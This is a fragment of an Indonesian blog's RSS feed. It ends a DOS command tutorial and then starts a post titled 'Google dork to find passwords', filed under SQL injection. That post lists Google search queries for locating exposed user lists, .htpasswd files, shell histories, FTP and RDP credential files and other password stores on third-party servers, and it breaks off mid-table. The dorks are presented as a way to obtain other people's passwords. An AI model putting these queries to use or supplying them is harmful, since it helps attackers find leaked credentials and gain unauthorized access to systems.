&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Rename [namafile] [namabaru]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Sama seperti ren, berfungsi untuk mengganti nama suatu file.&lt;br /&gt;
Contoh :&lt;br /&gt;
Rename kinta.doc kuliah.doc&lt;br /&gt;
Perintah ini akan mengganti nama kinta.doc dengan kuliah.doc&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;TYPE [drive:][path]filename&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk menampilkan file berfomat text (*.txt) atau file lainnya yang&lt;br /&gt;
didukung oleh dos.&lt;br /&gt;
Contoh :&lt;br /&gt;
Type tentangku.txt&lt;br /&gt;
Perintah ini akan menampilkan file tentangku.txt&lt;a href="http://kidzoom.files.wordpress.com/2010/03/image40.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="image" border="0" height="63" src="http://kidzoom.files.wordpress.com/2010/03/image_thumb40.png?w=405&amp;amp;h=63" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="image" width="405" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div align="center" style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;LAEN-LAEN&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;&lt;div align="left"&gt;TREE [drive:][path] [/F] [/A]&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align="left" style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;/F : Dengan menambahkan option ini, maka file-file yang berada dalam folder&lt;br /&gt;
akan ditampilkan.&lt;br /&gt;
/A : Menggunakan format ASCII dalam menampilkan karakter.&lt;br /&gt;
Contoh:&lt;br /&gt;
Type f:&lt;br /&gt;
Perintah ini menampilkan susunan direktori yang berada pada drive f.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/image41.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="image" border="0" height="178" src="http://kidzoom.files.wordpress.com/2010/03/image_thumb41.png?w=302&amp;amp;h=178" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="image" width="302" /&gt;&lt;/a&gt;&lt;br /&gt;
Tree f: /f&lt;br /&gt;
Perintah ini menampikan folder beserta file yang berada pada drive f.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/image42.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="image" border="0" height="182" src="http://kidzoom.files.wordpress.com/2010/03/image_thumb42.png?w=244&amp;amp;h=182" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="image" width="244" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Edit&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Text editor untuk dos.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/image43.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="image" border="0" height="220" src="http://kidzoom.files.wordpress.com/2010/03/image_thumb43.png?w=363&amp;amp;h=220" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="image" width="363" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Tambahan :&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;ATTRIB Perintah eksternal. Untuk melihat/mengubah atribut file&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;CLS Perintah internal. Untuk menghapus layar monitor&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;COPY Perintah internal. Untuk mengkopi file&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;DEL Perintah internal. Untuk menghapus file&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;DIR Perintah internal. Untuk melihat daftar file/folder di folder/direktori tertentu&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;MD Perintah internal. Untuk membuat direktori/folder baru&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;RD Perintah internal. Untuk menghapus folder (folder kosong)&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;REN Perintah internal. Untuk mengubah nama file/folder&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;TYPE Perintah internal. Untuk melihat isi fileEDIT Perintah eksternal. Untuk mengedit file teks (interaktif)&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;FDISK Perintah eksternal. Untuk melihat/mengubah/membuat partisi harddisk&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;FORMAT Perintah eksternal. Untuk memformat disket/harddisk&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;MORE Untuk mencegah tampilan menggulung terus-menerus&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;SYS Eksternal apa internal ya? Yang jelas untuk membuat disket/harddisk jadi bootable DEBUG Perintah eksternal. Untuk melihat/mengubah isi file dalam format heksadesimal&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;REG Perintah eksternal. Untuk melihat/mengubah/menghapus key/value registry&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;TASKKILL Perintah eksternal. Untuk menghentikan/membunuh proses yang sedang berlangsung&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;TASKLIST Perintah eksternal. Untuk melihat daftar proses yang sedang berlangsung&lt;/li&gt;
&lt;/ul&gt;&lt;div align="center" style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;PERINTAH-PERINTAH BATCH&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;MELIHAT DAFTAR FILE: “DIR”&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Perintah “DIR” berfungsi untuk melihat daftar file/folder yang berada di direktori atau folder tertentu. Sebenarnya perintah DIR mempunyai banyak sekali parameter perintah yang dapat kita gunakan untuk membatasi daftar file/folder yang kita inginkan. Di antaranya, parameter-parameter ini dapat kita gunakan untuk menentukan file, folder atau file dan folder yang ingin kita lihat di direktori/folder tertentu, kemudian menentukan apakah kita akan menampilkan file-file yang hidden atau tidak, kemudian mengurutkan berdasarkan nama, tanggal, ukuran, dan sebagainya. Untuk mengetahui daftar parameter dan cara penggunaannya, ketikkan “DIR /?” kemudian tekan Enter.&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Melihat daftar file/folder dalam direktori/folder tertentu&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;i&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;rep : kidzoom.wordpress.com&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-8991590930482888075?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-07T14:56:47.501+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Google dork buat cari password</title><link>http://vanzuearticles.blogspot.com/2010/04/google-dork-buat-cari-password.html</link><category>SQL INJECTION</category><author>vanzue@gmail.com</author><pubDate>Wed, 07 Apr 2010 00:48:23 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-5966740755713474474</guid><description>&lt;span class="Apple-style-span" style="font-family: Arial; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;div class="content" style="color: #333333; font: normal normal normal 13px/normal Verdana; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;div id="post_message_1277801" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;blockquote class="postcontent restore " style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; word-wrap: break-word;"&gt;KATA KUNCI | KETERANGAN&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:admin inurl: |userlist Generic userlist files&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:admin filetype: |asp Generic userlist files&lt;br /&gt;
inurl:userlist |&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl: |Half-life statistics file, lists username and&lt;br /&gt;
hlstats intext: |other information&lt;br /&gt;
Server Username |&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:ctl |&lt;br /&gt;
inurl:haccess. |Microsoft FrontPage equivalent of htaccess&lt;br /&gt;
ctl Basic |shows Web user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:reg |&lt;br /&gt;
reg intext: |Microsoft Internet Account Manager can&lt;br /&gt;
———————————————————&lt;br /&gt;
”internet account manager” |reveal usernames and more&lt;br /&gt;
filetype:wab wab |Microsoft Outlook Express Mail address&lt;br /&gt;
|books&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:mdb inurl:profiles |Microsoft Access databases containing&lt;br /&gt;
|profiles.&lt;br /&gt;
———————————————————&lt;br /&gt;
index.of perform.ini |mIRC IRC ini file can list IRC usernames and&lt;br /&gt;
|other information&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be&lt;br /&gt;
|used to discover usernames&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:conf inurl:proftpd. |PROFTP FTP server configuration file&lt;br /&gt;
conf –sample |reveals&lt;br /&gt;
|username and server information&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:log username putty |PUTTY SSH client logs can reveal&lt;br /&gt;
|usernames&lt;br /&gt;
|and server information&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:rdp rdp |Remote Desktop Connection files reveal user&lt;br /&gt;
|credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:index.of |UNIX bash shell history reveals commands&lt;br /&gt;
.bash_history |typed at a bash command prompt; usernames&lt;br /&gt;
|are often typed as argument strings&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:index.of |UNIX shell history reveals commands typed at&lt;br /&gt;
.sh_history |a shell command prompt; usernames are&lt;br /&gt;
|often typed as argument strings&lt;br /&gt;
———————————————————&lt;br /&gt;
“index of ” lck |Various lock files list the user currently using&lt;br /&gt;
|a file&lt;br /&gt;
———————————————————&lt;br /&gt;
+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-&lt;br /&gt;
Total Usernames +intext: |names and statistical information&lt;br /&gt;
”Usage Statistics for”&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:reg reg HKEY_ |Windows Registry exports can reveal&lt;br /&gt;
CURRENT_USER |username usernames and other information&lt;br /&gt;
———————————————————&lt;br /&gt;
&lt;br /&gt;
TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD&lt;br /&gt;
&lt;br /&gt;
———————————————————&lt;br /&gt;
KATA KUNCI | KETERANGAN&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:/db/main.mdb |ASP-Nuke passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:cfm “cfapplication |ColdFusion source with potential passwords&lt;br /&gt;
name” password&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:pass |dbman credentials&lt;br /&gt;
pass intext:userid&lt;br /&gt;
———————————————————&lt;br /&gt;
allinurl:auth_user_file.txt |DCForum user passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
eggdrop filetype:user user |Eggdrop IRC user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:url +inurl:”&lt;a href="ftp://xn--ivg/" style="color: #417394; text-decoration: none;" target="_blank"&gt;ftp://”&lt;/a&gt;&amp;nbsp;|FTP bookmarks cleartext passwords&lt;br /&gt;
+inurl:”@”&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:zebra.conf intext: |GNU Zebra passwords&lt;br /&gt;
password -sample -test&lt;br /&gt;
-tutorial –download&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials&lt;br /&gt;
“htgroup” -intitle:”dist”&lt;br /&gt;
-apache -htpasswd.c&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials&lt;br /&gt;
htpasswd.bak&lt;br /&gt;
———————————————————&lt;br /&gt;
“&lt;a href="http://*:*@xn--www-9o0a/" style="color: #417394; text-decoration: none;" target="_blank"&gt;http://*:*@www”&lt;/a&gt;&amp;nbsp;bob:bob |HTTP passwords (bob is a sample username)&lt;br /&gt;
———————————————————&lt;br /&gt;
“sets mode: +k” |IRC channel keys (passwords)&lt;br /&gt;
———————————————————&lt;br /&gt;
“Your password is * |Remember IRC NickServ registration passwords&lt;br /&gt;
this for later use”&lt;br /&gt;
———————————————————&lt;br /&gt;
signin filetype:url |JavaScript authentication credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
LeapFTP intitle:”index.of./” |LeapFTP client login credentials&lt;br /&gt;
